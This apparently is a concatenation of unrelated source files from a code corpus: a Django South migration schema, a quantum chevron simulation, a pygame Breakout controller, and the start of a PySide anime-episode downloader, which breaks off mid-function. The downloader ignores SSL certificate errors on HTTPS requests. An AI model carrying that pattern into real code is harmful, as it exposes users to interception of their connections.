'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'generic.assignedkeyword': {
'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': u"orm['generic.Keyword']"}),
'object_pk': ('django.db.models.fields.IntegerField', [], {})
},
u'generic.keyword': {
'Meta': {'object_name': 'Keyword'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'sfpirgapp.actiongroup': {
'Meta': {'ordering': "('_order',)", 'object_name': 'ActionGroup'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'action_groups'", 'to': u"orm['sfpirgapp.Category']"}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'theme_color': ('django.db.models.fields.CharField', [], {'default': "'grey'", 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actiongroups'", 'to': u"orm['auth.User']"})
},
u'sfpirgapp.address': {
'Meta': {'object_name': 'Address'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'street2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'sfpirgapp.application': {
'Meta': {'object_name': 'Application'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sfpirgapp.Project']"}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'})
},
u'sfpirgapp.category': {
'Meta': {'ordering': "('_order',)", 'object_name': 'Category'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'theme_color': ('django.db.models.fields.CharField', [], {'default': "'grey'", 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'categorys'", 'to': u"orm['auth.User']"})
},
u'sfpirgapp.dummytable': {
'Meta': {'object_name': 'DummyTable'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'sfpirgapp.liaison': {
'Meta': {'object_name': 'Liaison'},
'alt_email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'liaisons'", 'to': u"orm['sfpirgapp.Organization']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'sfpirgapp.organization': {
'Meta': {'object_name': 'Organization'},
'communities': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'contact_alt_email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_phone': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_position': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_registered': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mailing_city': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mailing_postal_code': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mailing_street': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mailing_street2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'mandate': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'sources_of_funding': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'sfpirgapp.profile': {
'Meta': {'object_name': 'Profile'},
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'on_mailing_list': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sfpirgapp.Organization']", 'null': 'True', 'blank': 'True'}),
'photo': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'sfpirgapp.project': {
'Meta': {'object_name': 'Project'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'arx_projects'", 'to': u"orm['sfpirgapp.Category']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description_long': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_short': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'issues_addressed': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'larger_goal': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'length': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'liaison': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sfpirgapp.Liaison']", 'null': 'True', 'blank': 'True'}),
'logo': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'project_subject': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sfpirgapp.ProjectSubject']", 'symmetrical': 'False'}),
'project_subject_other': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'project_type': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sfpirgapp.ProjectType']", 'symmetrical': 'False'}),
'project_type_other': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'researcher_qualities': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'results_plan': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'size': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'support_method': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'time_per_week': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'sfpirgapp.projectsubject': {
'Meta': {'object_name': 'ProjectSubject'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'sfpirgapp.projecttype': {
'Meta': {'object_name': 'ProjectType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'sfpirgapp.testimonial': {
'Meta': {'ordering': "('_order',)", 'object_name': 'Testimonial'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'testimonials'", 'to': u"orm['sfpirgapp.Category']"}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'theme_color': ('django.db.models.fields.CharField', [], {'default': "'grey'", 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'testimonials'", 'to': u"orm['auth.User']"})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['sfpirgapp']
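# Hedged usage note (not part of the generated file): with South installed,
# this schema change would be applied with something like
#     python manage.py migrate sfpirgapp 0022
# and rolled back by migrating to the previous migration number.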
|
bsd-2-clause
| -7,932,003,057,941,393,000
| 78.686709
| 187
| 0.562311
| false
| 3.590475
| false
| false
| false
|
QudevETH/PycQED_py3
|
pycqed/simulations/chevron_sim.py
|
1
|
2373
|
"""
Based on Olli's mathematica notebook used to simulate chevrons
"""
import numpy as np
from scipy.linalg import expm
ham = lambda e, g: np.array([[0.5*e, g], [g, -0.5*e]])  # two-level Hamiltonian 0.5*e*sigma_z + g*sigma_x
evol = lambda e, g, dt: expm(dt*1j*ham(e, g))  # single-step propagator exp(1j*H*dt)
def rabisim(efun, g, t, dt):
"""
    This function returns the evolution of a system described by the
    Hamiltonian:
        H = 0.5*efun(t)*sigma_z + g*sigma_x
    Inputs:
        efun, Function that returns the energy parameter vs time.
        g, Coupling parameter
        t, Final time of the evolution
        dt, Stepsize of the time evolution
    Outputs:
        f_vec, Evolution for times (1, 1+dt, ..., t)
"""
s0 = np.array([1, 0])
ts = np.arange(1., t+0.5*dt, dt)
f = lambda st, ti: np.dot(evol(efun(ti), g, dt), st)
f_vec = np.zeros((len(ts), 2), dtype=np.complex128)
f_vec[0, :] = s0
    for i, ti in enumerate(ts[:-1]):
        f_vec[i+1, :] = f(f_vec[i], ti)
return f_vec
qamp = lambda vec: np.abs(vec[:, 1])**2  # population of the second (excited) state
def chevron(e0, emin, emax, n, g, t, dt, sf):
"""
Inputs:
        e0, sets the energy scale at the center (detuning).
emin, sets min energy to simulate, in e0 units.
emax, sets max energy to simulate, in e0 units.
n, sets number of points in energy array.
g, Coupling parameter.
t, Final time of the evolution.
dt, Stepsize of the time evolution.
sf, Step function of the distortion kernel.
"""
energy_func = lambda energy, t: e0*(1.-(energy*sf(t))**2)
energy_vec = np.arange(1+emin, 1+emax, (emax-emin)/(n-1))
chevron_vec = []
for ee in energy_vec:
chevron_vec.append(
qamp(rabisim(lambda t: energy_func(ee, t), g, t, dt)))
return np.array(chevron_vec)
def chevron_slice(e0, energy, g, t, dt, sf):
"""
Inputs:
        e0, sets the energy scale at the center (detuning).
energy, energy of the slice to simulate, in e0 units.
g, Coupling parameter.
t, Final time of the evolution.
dt, Stepsize of the time evolution.
sf, Step function of the distortion kernel.
"""
energy_func = lambda energy, t: e0*(1.-(energy*sf(t))**2)
return qamp(rabisim(lambda t: energy_func(energy, t), g, t, dt))
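if __name__ == '__main__':
    # Hedged usage sketch (not part of the original notebook port): simulate
    # a chevron with an ideal, undistorted step function sf(t) = 1. All
    # parameter values below are illustrative assumptions.
    ideal_step = lambda t: 1.0
    chev = chevron(e0=1.0, emin=-0.5, emax=0.5, n=11, g=0.05, t=100, dt=1.0,
                   sf=ideal_step)
    print(chev.shape)  # one row per simulated detuning, one column per time step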
|
mit
| -6,412,169,818,103,500,000
| 33.897059
| 81
| 0.554994
| false
| 3.085826
| false
| false
| false
|
felipead/breakout
|
source/breakout/game/GameController.py
|
1
|
4147
|
from OpenGL.GL import *
from OpenGL.GLU import *
import pygame
from pygame.constants import *
from breakout.game.GameEngine import GameEngine
_FRAMES_PER_SECOND = 60
_MOUSE_VISIBLE = True
_CANVAS_WIDTH = 250
_CANVAS_HEIGHT = 300
_DEFAULT_SCREEN_WIDTH = 500
_DEFAULT_SCREEN_HEIGHT = 600
class GameController(object):
def __init__(self):
self.__engine = GameEngine(_CANVAS_WIDTH, _CANVAS_HEIGHT)
self.__screenWidth = _DEFAULT_SCREEN_WIDTH
self.__screenHeight = _DEFAULT_SCREEN_HEIGHT
def run(self):
self.__initialize()
self.__gameLoop()
def __initialize(self):
pygame.init()
pygame.mouse.set_visible(_MOUSE_VISIBLE)
pygame.display.set_mode((self.__screenWidth, self.__screenHeight), OPENGL | DOUBLEBUF)
glClearColor(0.0, 0.0, 0.0, 1.0)
glShadeModel(GL_FLAT)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glBlendEquation(GL_FUNC_ADD)
self.__handleScreenResizeEvent(self.__screenWidth, self.__screenHeight)
self.__engine.initialize()
def __gameLoop(self):
clock = pygame.time.Clock()
ticks = 0
while True:
for event in pygame.event.get():
self.__handleInputEvent(event)
milliseconds = clock.tick(_FRAMES_PER_SECOND)
ticks += 1
self.__engine.update(milliseconds, ticks)
self.__engine.display(milliseconds, ticks, self.__screenWidth, self.__screenHeight, clock.get_fps())
pygame.display.flip() # swap buffers
def __handleInputEvent(self, event):
if event.type == QUIT:
exit()
elif event.type == VIDEORESIZE:
self.__handleScreenResizeEvent(event.w, event.h)
elif event.type == MOUSEMOTION:
self.__handleMouseMoveEvent(event.pos, event.rel, event.buttons)
elif event.type == MOUSEBUTTONUP:
self.__handleMouseButtonUpEvent(event.button, event.pos)
elif event.type == MOUSEBUTTONDOWN:
self.__handleMouseButtonDownEvent(event.button, event.pos)
elif event.type == KEYUP:
self.__handleKeyUpEvent(event.key, event.mod)
elif event.type == KEYDOWN:
self.__handleKeyDownEvent(event.key, event.mod, event.unicode)
def __handleScreenResizeEvent(self, width, height):
self.__screenWidth = width
self.__screenHeight = height
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(self.__engine.canvas.left, self.__engine.canvas.right,
self.__engine.canvas.bottom, self.__engine.canvas.top)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def __handleMouseButtonUpEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonUpEvent(button, mappedCoordinates)
def __handleMouseButtonDownEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonDownEvent(button, mappedCoordinates)
def __handleMouseMoveEvent(self, absolute_coordinates, relative_coordinates, buttons):
mapped_absolute_coordinates = self.__mapScreenCoordinatesToCanvas(absolute_coordinates)
self.__engine.handleMouseMoveEvent(mapped_absolute_coordinates, relative_coordinates, buttons)
def __handleKeyUpEvent(self, key, modifiers):
self.__engine.handleKeyUpEvent(key, modifiers)
def __handleKeyDownEvent(self, key, modifiers, char):
self.__engine.handleKeyDownEvent(key, modifiers, char)
def __mapScreenCoordinatesToCanvas(self, coordinates):
horizontalCanvasToScreenRatio = self.__engine.canvas.width / float(self.__screenWidth)
verticalCanvasToScreenRatio = self.__engine.canvas.height / float(self.__screenHeight)
(x, y) = coordinates
x *= horizontalCanvasToScreenRatio
y *= verticalCanvasToScreenRatio
y = self.__engine.canvas.top - y
return x, y
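if __name__ == '__main__':
    # Hedged entry point (assumes pygame, PyOpenGL and the breakout package
    # are importable in this environment): start the game loop.
    GameController().run()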
|
gpl-2.0
| 2,273,906,769,018,133,000
| 35.699115
| 112
| 0.661201
| false
| 3.938272
| false
| false
| false
|
pampi/pad
|
backend.py
|
1
|
26210
|
#Copyright (C) 2014 Adrian "APi" Pielech
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
from PySide.QtNetwork import *
from PySide.QtCore import *
from PySide.QtGui import *
from subprocess import Popen, PIPE
class EPISODE(QListWidgetItem):
def __init__(self, parent=None, title='<Title>', value='<Value>'):
super(EPISODE, self).__init__(parent)
self.title = title
self.value = value
def setText(self, title):
self.title = title
super(EPISODE, self).setText(self.title)
def setValue(self, value):
self.value = value
def getValue(self):
return self.value
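# Hedged usage sketch (illustrative values only): an EPISODE pairs the text
# shown in the episode list with the hidden URL it downloads from.
#
#     ep = EPISODE()
#     ep.setText('Odcinek 1')
#     ep.setValue('http://example.com/ep1.mp4')  # hypothetical URL
#     ep.getValue()  # -> 'http://example.com/ep1.mp4'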
class DownloadEpisodeThread(QThread):
saveTo = None
who_am_i = 0
def __init__(self, parent, threadId):
super(DownloadEpisodeThread, self).__init__()
self.parentObject = parent
self.who_am_i = threadId
def run(self):
qNetMgr = QNetworkAccessManager()
downloadLoop = QEventLoop()
loopArg = True
item = None
p = self.parentObject
while(loopArg is True):
p.downloadMutex.tryLock(-1)
if(p.lstwToDownload.count() > 0):
item = p.lstwToDownload.takeItem(0)
p.appendLogs.emit('Zaczynam pobierać: ' + item.text())
else:
loopArg = False
item = None
if p.downloadedEps == p.mustDownloadEps:
p.btnDownload.setEnabled(True)
p.freezeSettings(True)
p.btnDownloadEpisodesList.setEnabled(True)
p.downloadMutex.unlock()
if not(item is None):
qReply = qNetMgr.get(QNetworkRequest(QUrl(item.getValue())))
if item.getValue().count('https://') > 0:
qReply.sslErrors.connect(qReply.ignoreSslErrors)
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302:
redirURL = qReply.attribute(QNetworkRequest.RedirectionTargetAttribute)
qReply = qNetMgr.get(QNetworkRequest(QUrl(redirURL)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200:
p.lblThreadArray[self.who_am_i].setText(item.text())
p.pbThreadArray[self.who_am_i].setEnabled(True)
self.saveTo = QFile(item.text())
if not self.saveTo.open(QIODevice.WriteOnly):
print('Nie moge otworzyc panie ;_;')
qReply.downloadProgress.connect(self.saveToFile)
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
p.pbThreadArray[self.who_am_i].setEnabled(False)
self.saveTo.write(qReply.readAll())
self.saveTo.close()
p.downloadMutex.tryLock(-1)
p.downloadedEps = p.downloadedEps + 1
p.pbDownloaded.setValue(p.downloadedEps)
p.appendLogs.emit(item.text() + ' pobrano!')
if p.chkbConvert.isChecked() is True:
p.lstwToConvert.addItem(item)
p.sigConvert.emit()
p.downloadMutex.unlock()
else:
p.downloadMutex.tryLock(-1)
p.appendLogs.emit('Nie udało się pobrać ' + item.text() + '! Błąd: ' + str(qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute)) + '.')
p.downloadedEps = p.downloadedEps + 1
p.pbDownloaded.setValue(p.downloadedEps)
p.downloadMutex.unlock()
def saveToFile(self, received, total):
if total != self.parentObject.pbThreadArray[self.who_am_i].maximum():
self.parentObject.pbThreadArray[self.who_am_i].setMaximum(total)
self.parentObject.pbThreadArray[self.who_am_i].setValue(received)
class Backend:
def writeLog(self, log_message):
self.logDest.setPlainText(log_message + "\n" + self.logDest.toPlainText())
def convertEpisode(self):
self.convertMutex.tryLock(-1)
self.downloadMutex.tryLock(-1)
workItem = self.lstwToConvert.takeItem(0)
self.downloadMutex.unlock()
output_file = workItem.text()[:len(workItem.text()) - 3] + self.cbOutputFormat.currentText()
file_info = Popen(['ffmpeg', '-i', workItem.text()], stderr=PIPE)
file_info.wait()
file_info = file_info.stderr.read(-1).decode('utf-8')
file_info = file_info[file_info.find('Duration:') + 10:]
file_info = file_info[:file_info.find(',')]
file_time_info = file_info.split(':')
file_time_info = file_time_info + file_time_info[2].split('.')
length = int(file_time_info[0]) * 3600 + int(file_time_info[1]) * 60 + int(file_time_info[3])
self.pbConverted.setMaximum(length)
self.pbConverted.setValue(0)
self.appendLogs.emit('Zaczynam konwertować: ' + workItem.text())
'''TO DO Start converting'''
self.convertMutex.unlock()
def getEpisodesListFromWeb(self, linkToSeries, lblSeriesName, lstItems, log):
lstItems.clear()
self.logDest = log
if len(linkToSeries) > 15:
if linkToSeries.find('animeon.pl') >= 0:
lblSeriesName.setText(self.getAnimeOnList(linkToSeries, lstItems))
elif linkToSeries.find('anime-shinden.info') >= 0:
lblSeriesName.setText(self.getAShindenList(linkToSeries, lstItems))
else:
self.writeLog("Podano URL do nieobsługiwanego serwisu!")
else:
self.writeLog("Nieprawidłowy URL do serii!")
def getVideoListFromURL(self, get_from):
ret_val = [None]
basic_filename = get_from.text()
episode_page_url = get_from.getValue()
'''print(episode_page_url)'''
if episode_page_url.find('animeon.pl') > 0:
ret_val = self.extractLinksFromAnimeOn(episode_page_url, basic_filename)
elif (episode_page_url.find('anime-shinden.info') > 0) or (episode_page_url.find('shinden-anime.info') > 0):
episode_page_url = episode_page_url.replace('shinden-anime.info', 'anime-shinden.info')
ret_val = self.extractLinksFromAShinden(episode_page_url, basic_filename)
else:
self.writeLog('Coś poszło nie tak... Nie rozpoznano serwisu anime.\nCzy przypadkiem nie bawisz się w inżynierię odwrotną?')
return ret_val
def extractLinksFromAShinden(self, link, basename):
ret_val = [None]
self.writeLog('Pobieranie i parsowanie strony ' + basename + '...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(link)))
